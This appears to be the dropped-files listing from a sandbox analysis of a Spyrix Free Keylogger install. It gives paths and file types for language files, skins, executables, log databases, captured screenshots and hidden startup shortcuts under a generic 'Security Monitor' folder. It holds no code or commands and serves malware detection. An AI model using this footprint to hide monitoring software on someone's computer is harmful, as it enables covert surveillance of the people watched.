C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-UDCT4.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-VIN6N.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\keyboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\law_warning.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\logging.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\noPRO.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\noURL.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\norton_warning.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\scheduler.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\screenshot.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\settings.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\siteblock.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\snapshot.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\sound.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\video.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\websites.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish.lng (copy)
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\SN.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\activity.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\alarms.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\clipboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\delivery.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-0BO2D.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-1S7FJ.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-4EDJE.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-9S883.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-ANRBD.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-BLE6M.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-CKLNR.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-DJ3MN.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-FP2JJ.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-I9L13.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-IQIC6.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-JEP15.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-JFQN5.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-L61JI.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-SVVRT.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-TE8SC.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-V4A2L.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\keyboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\logging.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\noPRO.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\noURL.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\scheduler.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\screenshot.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\settings.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\siteblock.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\snapshot.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\sound.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\video.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\websites.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish.lng (copy)
Unicode text, UTF-8 text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\SN.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\activity.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\alarms.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\clipboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\delivery.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-03IPS.tmp
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-2CHSA.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-583BD.tmp
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-5CVA8.tmp
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-7U44V.tmp
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-8QP2V.tmp
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-9F2RK.tmp
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-CSDRP.tmp
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-DSAIP.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-EAD4O.tmp
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-FFQ50.tmp
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-FTU8J.tmp
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-GQN9V.tmp
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-H1BQK.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-HREJ0.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-NOU64.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-VPIEG.tmp
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\keyboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\logging.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\noPRO.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\noURL.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\scheduler.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\screenshot.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\settings.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\siteblock.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\snapshot.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\sound.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\video.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\websites.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\logo.png (copy)
PNG image data, 197 x 285, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\main.ico (copy)
MS Windows icon resource - 7 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 32 bits/pixel, -128x-128, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\offer.url (copy)
MS Windows 95 Internet shortcut text (URL=<"http://www.spyrix.com/spyrix-products.php?from=sfk_install">), ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.cmd (copy)
ASCII text, with very long lines (382), with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.vbs (copy)
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sgw.m (copy)
JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, xresolution=98, yresolution=106, resolutionunit=2, software=paint.net 4.0.10], baseline, precision 8, 320x240, components 3
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\Air.skn (copy)
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\Android.skn (copy)
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\Charm.skn (copy)
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\Default.skn (copy)
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\HUD.skn (copy)
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\SnowLeopard.skn (copy)
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\Ubuntu.skn (copy)
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\Win8.skn (copy)
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\iOS4.skn (copy)
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\is-1G823.tmp
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\is-78BUT.tmp
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\is-AQ7SQ.tmp
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\is-IENIN.tmp
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\is-K27AM.tmp
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\is-MMUQD.tmp
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\is-SLKI9.tmp
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\is-TDORK.tmp
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\is-U7M79.tmp
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe (copy)
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe (copy)
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe (copy)
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spyrix.url (copy)
MS Windows 95 Internet shortcut text (URL=<"https://www.spyrix.com/purchase.php?from=sfk_uninstall">), ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sqlite3.dll (copy)
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ssleay32.dll (copy)
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\info.dat (copy)
GIF image data, version 89a, 884 x 198
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\info.net (copy)
ASCII text, with no line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\info.ttl (copy)
GIF image data, version 89a, 327 x 57
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\is-34584.tmp
ASCII text, with no line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\is-KVJM4.tmp
GIF image data, version 89a, 327 x 57
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\is-N96TJ.tmp
GIF image data, version 89a, 884 x 198
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\ru\info.dat (copy)
GIF image data, version 89a, 884 x 198
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\ru\info.net (copy)
ASCII text, with no line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\ru\info.ttl (copy)
GIF image data, version 89a, 327 x 57
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\ru\is-1S4L6.tmp
GIF image data, version 89a, 327 x 57
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\ru\is-IUA6J.tmp
GIF image data, version 89a, 884 x 198
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\ru\is-LO8O5.tmp
ASCII text, with no line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\tmain.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\unins000.dat
InnoSetup Log Spyrix Free Keylogger 11.6.22, version 0x418, 231571 bytes, 320366\37\user\37, C:\ProgramData\Security Monitor\{827D21CC-
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\unins000.exe (copy)
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\ProgramData\Security Monitor\{WCS1080F-FD66-4650-B1B8-C8310A1CE2D3}\ffws.exe
PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
dropped
C:\ProgramData\Spyrix Free Keylogger\logs\45567.log
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Spyrix Free Keylogger\logs\45567.wdb
SQLite 3.x database, last written using SQLite version 3013000, file counter 9, database pages 4, cookie 0x2, schema 4, UTF-8, version-valid-for 9
dropped
C:\ProgramData\Spyrix Free Keylogger\logs\45567.wdb-journal
SQLite Rollback Journal
dropped
C:\ProgramData\Spyrix Free Keylogger\logs\logs.dat
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Spyrix Free Keylogger\scr\45567.0091360301.jpg
JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1280x1024, components 3
dropped
C:\ProgramData\Spyrix Free Keylogger\scr\45567.0091768171.jpg
JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1280x1024, components 3
dropped
C:\ProgramData\Spyrix Free Keylogger\scr\scr.dat
ASCII text, with CRLF line terminators
modified
C:\ProgramData\Spyrix Free Keylogger\temp\desktop\Spyrix Free Keylogger.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=0, Archive, ctime=Wed Oct 2 03:12:36 2024, mtime=Wed Oct 2 03:12:46 2024, atime=Mon Sep 23 18:21:00 2024, length=5346216, window=hide
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\logger.ini
Generic INItialization configuration [System]
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\reg\info.dat (copy)
GIF image data, version 89a, 884 x 198
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\reg\info.net (copy)
ASCII text, with no line terminators
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\reg\info.ttl (copy)
GIF image data, version 89a, 327 x 57
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\reg\is-9MMFB.tmp
ASCII text, with no line terminators
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\reg\is-SD2OR.tmp
GIF image data, version 89a, 327 x 57
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\reg\is-SH1BS.tmp
GIF image data, version 89a, 884 x 198
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\reg\ru\info.dat (copy)
GIF image data, version 89a, 884 x 198
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\reg\ru\info.net (copy)
ASCII text, with no line terminators
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\reg\ru\info.ttl (copy)
GIF image data, version 89a, 327 x 57
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\reg\ru\is-2BBC3.tmp
GIF image data, version 89a, 884 x 198
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\reg\ru\is-5JB4G.tmp
GIF image data, version 89a, 327 x 57
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\reg\ru\is-GL6NF.tmp
ASCII text, with no line terminators
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\runprg.ini
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\start\Spyrix Free Keylogger.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=0, Archive, ctime=Wed Oct 2 03:12:36 2024, mtime=Wed Oct 2 03:12:36 2024, atime=Mon Sep 23 18:21:00 2024, length=5346216, window=hide
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\start\Uninstall Spyrix Free Keylogger.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Wed Oct 2 03:12:35 2024, mtime=Wed Oct 2 03:12:35 2024, atime=Wed Oct 2 03:11:54 2024, length=1308909, window=hide
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\stat\app_Monitoring_StartButton_C79C6F489015E0BC97F892E357DB7156
ASCII text, with very long lines (426), with no line terminators
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\stat\app_Monitoring_Start_C79C6F489015E0BC97F892E357DB7156
ASCII text, with very long lines (420), with no line terminators
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\stat\app_Run_First_C79C6F489015E0BC97F892E357DB7156
ASCII text, with very long lines (413), with no line terminators
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\stat\app_wizard_Start_C79C6F489015E0BC97F892E357DB7156
ASCII text, with very long lines (416), with no line terminators
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\stat\dlog\2024-10.wdb
SQLite 3.x database, last written using SQLite version 3013000, file counter 10, database pages 4, cookie 0x2, schema 4, UTF-8, version-valid-for 10
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\stat\dlog\2024-10.wdb-journal
SQLite Rollback Journal
dropped
